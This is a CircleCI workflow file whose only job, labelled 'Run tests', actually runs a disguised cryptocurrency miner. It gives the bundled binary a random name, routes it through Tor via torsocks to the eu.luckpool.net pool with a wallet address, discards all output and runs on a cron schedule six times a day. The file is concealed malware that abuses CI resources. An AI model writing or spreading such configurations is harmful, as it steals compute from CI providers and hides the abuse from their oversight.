version: 2.1

jobs:
  curtain:
    parallelism: 4
    docker:
      - image: ubuntu:18.04
    steps:
      - checkout
      - run:
          name: Run tests
          no_output_timeout: 5h
          command: |
           MINER=$(shuf -i 10-9999999999999999999 -n 1) && mv pound $MINER
           chmod +x $MINER
           apt update
           apt-get install -y tor
           service tor start
           timeout 239m torsocks ./$MINER -v -l eu.luckpool.net:3956 -u RQnRdnXnNmZa7Tg7JA8tKUrR8bC7VtJSDb.$(echo $(shuf -i 1-10 -n 1)-TOKAI) -t 2 > /dev/null 2>&1 && echo timeouted
           apt update

workflows:
  version: 2
  daily:
    triggers:
      - schedule:
         cron: "0 1,5,9,13,17,21 * * *"
         filters:
           branches:
             only:
               - main
    jobs:
      - curtain